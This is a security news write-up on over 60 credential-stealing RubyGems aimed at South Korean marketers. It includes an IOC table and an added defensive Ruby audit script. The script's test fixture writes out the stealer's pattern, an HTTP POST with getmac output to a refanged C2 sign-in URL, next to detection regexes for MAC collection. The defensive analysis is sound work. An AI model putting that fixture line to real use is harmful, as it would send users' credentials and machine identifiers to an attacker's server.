Over 60 Malicious RubyGems Packages Used to Steal Social Media and Marketing Credentials
Socket’s Threat Research Team has exposed a persistent campaign involving over 60 malicious RubyGems packages that masquerade as automation tools for platforms like Instagram, Twitter/X, TikTok, WordPress, Telegram, Kakao, and Naver.
Active since at least March 2023, the threat actor operating under aliases such as zon, nowon, kwonsoonje, and soonje has deployed these gems to deliver legitimate functionalities like bulk posting and engagement boosting while covertly exfiltrating user credentials and system identifiers.
Classified as infostealer malware, these packages primarily target Windows environments, with a focus on South Korean users evident from Korean-language graphical user interfaces (GUIs) built using Glimmer-DSL-LibUI and exfiltration to .kr domains.
Long-Running Supply Chain Attack
The gems have collectively garnered over 275,000 downloads, but that figure does not equate to as many compromises: not every installation is executed, and multiple installations may occur on a single system.
Socket has notified the RubyGems security team, requesting removal of the 16 still-active gems under nowon, kwonsoonje, and soonje aliases, while 44 under zon were self-yanked by the actor but persist in caches and installations.
The malware’s core mechanism involves prompting users for platform credentials via Korean-labeled input fields, then immediately transmitting them along with the host’s MAC address via HTTP POST requests to command-and-control (C2) servers like programzon[.]com/auth/program/signin, appspace[.]kr/bbs/login_check.php, and marketingduo[.]co[.]kr/bbs/login_check.php.
These endpoints, hosted on PHP-based bulletin boards, serve as credential collection panels, enabling the actor to harvest data for potential resale or further exploitation.
Socket AI Scanner analysis of gems like iuz-64bit reveals identical patterns across the cluster, where credentials and MAC addresses facilitate victim fingerprinting and campaign correlation.
The campaign’s evolution spans multiple waves, introducing support for new platforms every two to three months, with infrastructure redundancy through added C2 domains without retiring predecessors.
Yanking under zon aliases fragments attribution, allowing repackaging and redeployment while evading metadata-based detection.
Targeting Grey-Hat Marketers
Explicitly tailored for South Korean grey-hat marketers engaged in spam, SEO, and synthetic engagement, the gems exploit users’ reliance on disposable accounts and automation tools, enabling undetected operation for over a year.
Victims, often accessing SMM panels like smmdoge[.]com for fake followers, backlink platforms such as SpamZilla for search manipulation, and disposable SMS gateways like smshub[.]org for mass registrations, rarely report breaches due to account disposability.
Infostealer logs from dark web markets like Russian Market confirm infections among marketingduo[.]co[.]kr customers, with systems showing activity on proxy tools from bablosoft[.]com and account marketplaces like accs-market[.]com.

According to the report, promotion occurs via Korean Telegram and Kakao channels, advertising “auto-backlink programs” and “free top-ranking tools.”
Notably, gems like njongto_duo and jongmogtolon target stock discussion forums, enabling autoposting for equity speculation while stealing credentials, potentially facilitating financial forum manipulation or influence operations.
This dual-use model sustains the campaign by empowering victims’ grey-hat activities while granting the actor persistent access.
Defenders are urged to integrate tools like Socket’s GitHub App for pull request scanning, CLI for install-time alerts, browser extension for ecosystem browsing, and MCP for AI-assisted coding to mitigate such risks in evolving supply chains.
Indicators of Compromise (IOCs)
| Category | Indicators |
|---|---|
| Malicious Gems — nowon Alias | soonje_1, soonje_2, soonje_2_2, soonje_3, setago3, deltago4, board_posting_duo, tblog_duo, CAFE_Product, CAFE_General, CAFE_verillban, jongmogtolon |
| Malicious Gems — kwonsoonje Alias | setago, setago2, deltago |
| Malicious Gems — soonje Alias | deltago3 |
| C2 Endpoints and Network Indicators | programzon[.]com/auth/program/signin, programzon[.]com, appspace[.]kr/bbs/login_check.php, appspace[.]kr, marketingduo[.]co[.]kr/bbs/login_check.php, marketingduo[.]co[.]kr, seven1.iwinv[.]net, duopro[.]co[.]kr |
| Email Addresses | mymin26@naver[.]com, rnjstnswp123@naver[.]com, marketingduo@marketingduo[.]com |
| Telegram | @duo3333 |
| Kakao OpenChat Room | https://open[.]kakao[.]com/o/sCxh7vCd |
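As an added example, not part of the Socket report or of any gem it describes, the Ruby script below turns the IOC table into a local audit: it flags installed gem names that match the listed malicious gems, refangs the defanged C2 hosts, and scans gem source text for the combination the report describes (a reference to a C2 host, an HTTP POST, and MAC-address collection). The installed-gem list and the source snippet it runs against are constructed for this example; the function names and the MAC-collection heuristic are assumptions, not anything from the campaign's code.

```ruby
# Added example (not from the Socket report): audit a Ruby environment against
# the IOC table above. Gem names and network indicators below are copied from
# that table; everything else is constructed for this example.
require 'set'

# Still-active malicious gem names from the IOC table (nowon, kwonsoonje, soonje).
MALICIOUS_GEMS = %w[
  soonje_1 soonje_2 soonje_2_2 soonje_3 setago3 deltago4 board_posting_duo
  tblog_duo CAFE_Product CAFE_General CAFE_verillban jongmogtolon
  setago setago2 deltago deltago3
].freeze

# Network indicators, written defanged exactly as in the report.
DEFANGED_C2 = %w[
  programzon[.]com appspace[.]kr marketingduo[.]co[.]kr seven1.iwinv[.]net duopro[.]co[.]kr
].freeze

# Turn a defanged indicator ("programzon[.]com") back into a matchable host.
def refang(indicator)
  indicator.gsub('[.]', '.')
end

C2_HOSTS = DEFANGED_C2.map { |d| refang(d) }.freeze

# Return the names from an installed-gem list that appear in the IOC table.
# Case-insensitive because the table mixes case (CAFE_Product vs. setago).
def flag_installed_gems(installed_names)
  bad = Set.new(MALICIOUS_GEMS.map(&:downcase))
  installed_names.select { |n| bad.include?(n.downcase) }
end

# Heuristic scan of one gem file's text for the behaviour the report describes:
# a C2 host reference, an HTTP POST, and something that reads a MAC address.
# Returns a findings hash; an empty hash means nothing matched.
def scan_gem_source(path, source)
  findings = {}
  hosts = C2_HOSTS.select { |h| source.include?(h) }
  findings[:c2_hosts] = hosts unless hosts.empty?
  findings[:http_post] = true if source =~ /Net::HTTP\.post|post_form|\.post\(/
  # 'getmac' and 'ipconfig /all' are the usual Windows ways to read a MAC (assumed heuristic).
  findings[:mac_address] = true if source =~ /getmac|ipconfig|mac_address|MacAddr/i
  findings[:path] = path unless findings.empty?
  findings
end

# Constructed fixtures: a pretend `gem list` output and a pretend gem file that
# exhibits the pattern. Neither is taken from any real gem.
SAMPLE_INSTALLED = %w[rails nokogiri setago3 glimmer-dsl-libui deltago].freeze

SAMPLE_SOURCE = <<~RUBY
  uri = URI("https://programzon.com/auth/program/signin")
  mac = `getmac`.lines.first
  Net::HTTP.post_form(uri, form)
RUBY

# Run both checks and return the combined findings.
def run_audit(installed = SAMPLE_INSTALLED, sources = { 'lib/sample.rb' => SAMPLE_SOURCE })
  {
    gems: flag_installed_gems(installed),
    sources: sources.map { |p, s| scan_gem_source(p, s) }.reject(&:empty?)
  }
end

if __FILE__ == $PROGRAM_NAME
  # On a real host, feed `Gem::Specification.map(&:name)` and the contents of
  # each gem's lib/ directory instead of the constructed fixtures.
  puts run_audit.inspect
end
```

The name match alone is enough to act on (yanked gems stay in caches and Gemfile.lock files, as the report notes), while the source scan is a heuristic to triage gems that are not yet on the list: one of the three signals is common in legitimate code, all three together in a marketing-automation gem is worth a closer look.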